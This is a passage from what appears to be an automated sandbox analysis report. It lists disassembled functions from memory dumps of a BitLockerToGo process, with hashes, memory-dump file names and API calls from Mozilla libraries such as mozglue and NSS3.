                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16b19db587d712627a1d5f7c4aba2f4f1ba577eb39f4dd62fc827e74f492de22
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF15D716083458FD702CF28C48036ABBF6AFED318F158A2DE4D4877A1EB74D8858792
                                                                                                                                                                                                                                                                                                                    Function 6CA88EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5bed0e2dc6fb07dc2965799d973029b2e072210c059cdedb79f290f9e178c049
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b538529eb00d42373d680084c0fec2d95b51669fa99586cf5e1a0c9033c5ca54
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bed0e2dc6fb07dc2965799d973029b2e072210c059cdedb79f290f9e178c049
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA11BF32A022158BD704DF28D884B5AB7B5BF42318F0842AAD8158FA42CB75ECC6C7D1
                                                                                                                                                                                                                                                                                                                    Function 6CB60C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 37bbfbbb41077e2b6959067845c8a5652d5841bd1f8ef243af6eb8e96e1a6baf
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f92163f8da66b48d454d1a6b3efe3ca4af69b4c7328ceedae4baf741e6acd31a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37bbfbbb41077e2b6959067845c8a5652d5841bd1f8ef243af6eb8e96e1a6baf
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA11E3787043859FCB00DF2AD8806AA7BB5FF85368F14857DD8198BB01DB31E806CBA5
                                                                                                                                                                                                                                                                                                                    Function 6CB60D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 335e58d874dfe13ee1a27bc3e9cc5c9fb0cf6ceb0134494a868335967057a3ab
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16E0923A2020B4A7DB148E0BE450AA97359DF81619FB4817DCD5D9FE01D733F8038786
                                                                                                                                                                                                                                                                                                                    Function 6C9D55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32,?,6C9AE1A5), ref: 6C9D5606
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(gdi32,?,6C9AE1A5), ref: 6C9D560F
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C9D5633
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C9D563D
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C9D566C
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C9D567D
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C9D5696
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C9D56B2
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C9D56CB
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C9D56E4
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C9D56FD
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C9D5716
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C9D572F
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C9D5748
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C9D5761
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C9D577A
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C9D5793
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C9D57A8
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C9D57BD
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C9D57D5
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C9D57EA
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C9D57FF
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                                                    • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05ccd04a027cbd5bc84e2bfa03b4345692b877b378b1ee04051b942a51222402
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 25eabafe9eba6f20d6d20a5ecb32a7aebbdb0b97b28a28a5e849b3f745c47d5f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ccd04a027cbd5bc84e2bfa03b4345692b877b378b1ee04051b942a51222402
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C5151B0B15B025BEB029F35AD44D263AFDEB5634D7318469A931E2A41EF70D845CFA0
                                                                                                                                                                                                                                                                                                                    Function 6C9BCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C98582D), ref: 6C9BCC27
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C98582D), ref: 6C9BCC3D
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C9EFE98,?,?,?,?,?,6C98582D), ref: 6C9BCC56
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCC6C
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCC82
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCC98
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCCAE
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C9BCCC4
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C9BCCDA
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C9BCCEC
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C9BCCFE
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C9BCD14
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C9BCD82
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C9BCD98
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C9BCDAE
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C9BCDC4
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C9BCDDA
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C9BCDF0
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C9BCE06
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C9BCE1C
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C9BCE32
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C9BCE48
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C9BCE5E
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C9BCE74
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C9BCE8A
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: strcmp
                                                                                                                                                                                                                                                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                                                    • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 15004a706b272e89b98cb0c705fae61a839452eda890c067457e2230872df07b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 766b72771e136f228da3b57bfd6a23473be84e17576790d48d0093d50d1df7ae
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15004a706b272e89b98cb0c705fae61a839452eda890c067457e2230872df07b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D51CAC5B0532671FB0232596D10BAF180CEFF724AF10543AED69B5E81FB24E61A46B7
                                                                                                                                                                                                                                                                                                                    Function 6C984470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C984730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9844B2,6C9FE21C,6C9FF7F8), ref: 6C98473E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C984730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C98474A
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C9844BA
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C9844D2
                                                                                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C9FF80C,6C97F240,?,?), ref: 6C98451A
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C98455C
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C984592
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C9FF770), ref: 6C9845A2
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C9845AA
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C9845BB
                                                                                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C9FF818,6C97F240,?,?), ref: 6C984612
                                                                                                                                                                                                                                                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C984636
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C984644
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C98466D
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C98469F
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846AB
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846B2
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846B9
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846C0
                                                                                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9846CD
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C9846F1
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C9846FD
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                                                                    • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 1702738223-3894940629
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5f3ec801d3b3bbf3f3d8bd38563a992bf740e722d94cbdf28cc2b6c0cee427ac
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0d37ed4971926588697256b032e71772af85be6d9cdd796f2a0d2b13dd40f008
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f3ec801d3b3bbf3f3d8bd38563a992bf740e722d94cbdf28cc2b6c0cee427ac
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D6136B1609348AFEB008F60EC49B99BBFCEF4670CF248998E5249B681D770C945CF91
                                                                                                                                                                                                                                                                                                                    Function 6CAF4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4C50
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4C5B
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(6CBCAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4C76
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4CAE
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAF4CC9
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAF4CF4
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAF4D0B
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4D5E
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4D68
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CAF4D85
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CAF4DA2
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAF4DB9
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAF4DCF
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                                                    • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                                                    • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 14b488833664f9cf08aa6c64a9c399dcdad7008c43318d71176b523172164eb0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d4778d51689965da7e591d651d7c7f70e1a37a8f0f23b6ad23d14cbdc17be30
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14b488833664f9cf08aa6c64a9c399dcdad7008c43318d71176b523172164eb0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7418CB1E001816BEB119F589D40ABF3A75AF9635CF084124FC265B701E731D9AAC7E3
                                                                                                                                                                                                                                                                                                                    Function 6CAD2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CAD2DEC
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CAD2E00
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAD2E2B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAD2E43
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C,?,-00000001,00000000,?), ref: 6CAD2E74
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C,?,-00000001,00000000), ref: 6CAD2E88
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAD2EC6
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAD2EE4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAD2EF8
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD2F62
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD2F86
